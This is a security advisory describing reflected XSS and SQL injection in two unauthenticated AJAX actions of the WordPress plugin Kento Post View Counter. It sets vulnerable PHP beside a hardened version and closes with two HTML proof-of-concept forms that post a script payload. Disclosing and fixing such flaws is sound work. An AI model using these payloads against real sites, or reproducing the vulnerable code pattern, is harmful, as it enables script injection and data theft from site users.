Kento Post View Counter [Reflected XSS]

Description

The WordPress plugin Kento Post View Counter is vulnerable to reflected cross-site scripting (XSS); one of the affected actions is additionally vulnerable to SQL injection (see below).

The plugin registers two AJAX actions

  1. kento_pvc_top_geo
  2. kento_pvc_top_referer

which are also reachable by unauthenticated (not logged-in) users.

The vulnerable parameters are

  1. $_POST['kento_pvc_geo'] for kento_pvc_top_geo action
  2. $_POST['kpvc_date_referer'] for kento_pvc_top_referer action

The kento_pvc_top_geo action can also be exploited for SQL injection (DWF-2016-87021).
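The following is an added illustrative example, not code from the Kento Post View Counter plugin. It shows the pattern the advisory describes (an admin-ajax.php action registered with a nopriv hook that reflects a POST parameter into HTML unescaped, and passes it on to a query unprepared) beside a hardened version. Function names, the nonce action name, the capability and the table/column names are assumptions made for the example.

```php
<?php
// Illustrative example only; not the plugin's own code.
// Names such as kpvc_example_*, 'kpvc_example_nonce' and the
// wp_kpvc_example_views table are assumptions for this example.

// --- Vulnerable pattern (what the advisory describes) ---
function kpvc_example_top_geo_vulnerable() {
    global $wpdb;
    $geo = $_POST['kento_pvc_geo'];                      // attacker-controlled, unvalidated

    // Reflected XSS: the value lands in the HTML response unescaped.
    echo '<h3>Top countries for ' . $geo . '</h3>';

    // SQL injection: the same value is concatenated into the query.
    $rows = $wpdb->get_results(
        "SELECT country, COUNT(*) AS hits FROM wp_kpvc_example_views WHERE region = '" . $geo . "' GROUP BY country"
    );
    wp_die();
}
// The nopriv hook is what makes the action reachable without logging in.
// (Registrations for the vulnerable handler are commented out so that this
// file demonstrates only the hardened handler if it is ever loaded.)
// add_action( 'wp_ajax_kento_pvc_top_geo',        'kpvc_example_top_geo_vulnerable' );
// add_action( 'wp_ajax_nopriv_kento_pvc_top_geo', 'kpvc_example_top_geo_vulnerable' );

// --- Hardened version ---
function kpvc_example_top_geo_hardened() {
    global $wpdb;

    // 1. Authorisation: statistics views are an admin feature, so require a capability.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }

    // 2. CSRF protection: the request must carry a nonce for this action
    //    (sent in the 'nonce' POST field; the action name is an assumption).
    check_ajax_referer( 'kpvc_example_nonce', 'nonce' );

    // 3. Sanitise on input: strip slashes WordPress adds, then reduce to plain text.
    $geo = isset( $_POST['kento_pvc_geo'] )
        ? sanitize_text_field( wp_unslash( $_POST['kento_pvc_geo'] ) )
        : '';

    // 4. Parameterise the query instead of concatenating user input.
    $rows = $wpdb->get_results(
        $wpdb->prepare(
            "SELECT country, COUNT(*) AS hits FROM {$wpdb->prefix}kpvc_example_views WHERE region = %s GROUP BY country",
            $geo
        )
    );

    // 5. Escape on output for the context the value lands in (HTML body here).
    echo '<h3>Top countries for ' . esc_html( $geo ) . '</h3>';
    foreach ( $rows as $row ) {
        echo '<div>' . esc_html( $row->country ) . ': ' . (int) $row->hits . '</div>';
    }
    wp_die();
}
// Only the authenticated hook is registered: without a wp_ajax_nopriv_ hook,
// anonymous requests to admin-ajax.php get WordPress's default "0" response.
add_action( 'wp_ajax_kento_pvc_top_geo', 'kpvc_example_top_geo_hardened' );
```

The same treatment applies to kpvc_date_referer in the kento_pvc_top_referer handler. Note that sanitising input is not a substitute for escaping output: esc_html() (or esc_attr(), esc_js() as the context demands) is what stops the reflected value from being interpreted as markup, and $wpdb->prepare() is what stops it from being interpreted as SQL.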

PoC

<p>Action: kento_pvc_top_geo</p>
<form action="//wp1.dev/wp-admin/admin-ajax.php" method="post">
    <input type="hidden" name="action" value="kento_pvc_top_geo">
    <input type="hidden" name="kento_pvc_geo" value="<script>alert(String.fromCharCode(88, 83, 83))</script>">
    <button type="submit">Press Me</button>
</form>

<p>Action: kento_pvc_top_referer</p>
<form action="//wp1.dev/wp-admin/admin-ajax.php" method="post">
    <input type="hidden" name="action" value="kento_pvc_top_referer">
    <input type="hidden" name="kpvc_date_referer" value="<script>alert(String.fromCharCode(88, 83, 83))</script>">
    <button type="submit">Press Me</button>
</form>

INFO
GKxtL3WcoJHtnKZtqTuuqPOiMvOwqKWco3AcqUxX